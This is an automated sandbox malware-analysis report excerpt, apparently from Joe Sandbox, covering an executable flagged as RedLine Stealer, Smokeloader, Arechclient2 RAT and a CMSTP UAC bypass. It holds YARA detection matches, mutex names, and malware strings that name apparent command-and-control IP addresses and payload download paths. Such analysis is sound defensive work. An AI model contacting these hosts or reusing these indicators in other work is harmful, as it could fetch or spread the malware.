                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: String function: 6B0B94D0 appears 90 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: String function: 6C7EDAE0 appears 34 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: String function: 6C7E09D0 appears 140 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: String function: 6C683620 appears 32 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: String function: 004043B0 appears 316 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: String function: 6C689B10 appears 31 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: String function: 6B0ACBE8 appears 134 times
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: String function: 05CF9F27 appears 48 times
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: String function: 00409CC0 appears 48 times
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: String function: 05D17A73 appears 43 times
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: String function: 0042780C appears 43 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: String function: 00081310 appears 36 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: String function: 00081900 appears 31 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: String function: 000814F0 appears 60 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: String function: 00081930 appears 76 times
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: String function: 00209D36 appears 33 times
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392
                              Source: TNQTc6Qmkg.exe, 00000000.00000002.2973269957.0000000005F07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2225541278.0000000005F87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2237619009.0000000005F66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2228201523.0000000005F73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2225483723.0000000005F78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2236805991.0000000005F61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2238332150.0000000005F5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2237860092.0000000005F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2237646163.0000000005F7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2225932353.0000000005F79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2225433336.0000000005F5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2237518955.0000000005F6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231224725.0000000005F72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2237904684.0000000005F5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2237976229.0000000005F79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \OriginalFileName vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2226365489.0000000005F82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2225742168.0000000005F72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2228157373.0000000005F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2236985274.0000000005F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2238474568.0000000005F7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2238520188.0000000005F7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000000.1674370393.0000000004043000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirezer0 vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2228130224.0000000005F60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2225525850.0000000005F80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778740018.00000000042AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFirezer0 vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005F54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFirezer0 vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2227874761.0000000005F62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2236526203.0000000005F54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2779042432.0000000005F06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2235425712.0000000005F66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamempclient.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2225555404.0000000005F8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exeBinary or memory string: OriginalFilenameFirezer0 vs TNQTc6Qmkg.exe
                              Source: TNQTc6Qmkg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 5.2.run.exe.3c1a15b.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 14.2.cmd.exe.57b4e64.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 13.2.run.exe.3ea215b.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 5.2.run.exe.3bd686d.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 6.2.cmd.exe.56bbe64.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 13.2.run.exe.3e5e86d.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 27.2.MSBuild.exe.1370000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 14.2.cmd.exe.5770976.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 13.2.run.exe.3ea2d5b.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 6.2.cmd.exe.56bb264.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 6.2.cmd.exe.5677976.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 5.2.run.exe.3c1ad5b.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 14.2.cmd.exe.57b4264.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 6.2.cmd.exe.60b00c8.8.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                              Source: 14.2.cmd.exe.5d800c8.7.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@42/65@5/11
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,1_2_6B0D7030
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000BD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,5_2_000BD660
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_04265BD6 CreateToolhelp32Snapshot,Module32First,0_2_04265BD6
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,0_2_0042628B
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_00098040 LoadResource,LockResource,SizeofResource,5_2_00098040
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exeMutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeMutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6808
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4312
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile created: C:\Users\user\AppData\Local\Temp\u3bs.0.exeJump to behavior
                              Source: Yara matchFile source: 17.0.u3bs.3.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000011.00000000.2777480035.0000000000401000.00000020.00000001.01000000.00000012.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.2778288110.000000000720D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: eight0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: eight0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.900_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.900_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.900_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: Installed0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: Installed0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.590_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.590_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2030_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2030_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /timeSync.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /timeSync.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2030_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.590_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /timeSync.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /1/Package.zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /1/Package.zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /1/Package.zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: \run.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: \run.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: @0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.900_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.900_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.900_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: Installed0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: Installed0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.590_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.590_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2030_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2030_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /syncUpd.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /syncUpd.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /timeSync.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /timeSync.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2030_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.590_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /timeSync.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /syncUpd.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /1/Package.zip0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /1/Package.zip0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /1/Package.zip0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .zip0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .zip0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: \run.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: \run.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /BroomSetup.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /BroomSetup.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: 185.172.128.2280_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: /BroomSetup.exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .exe0_2_05D14C75
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCommand line argument: .exe0_2_05D14C75
                              Source: TNQTc6Qmkg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5168
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6460
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2580
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3872
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6888
